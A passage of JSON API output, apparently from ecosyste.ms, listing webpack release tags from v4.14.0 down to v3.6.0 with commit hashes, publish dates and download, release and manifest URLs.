ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at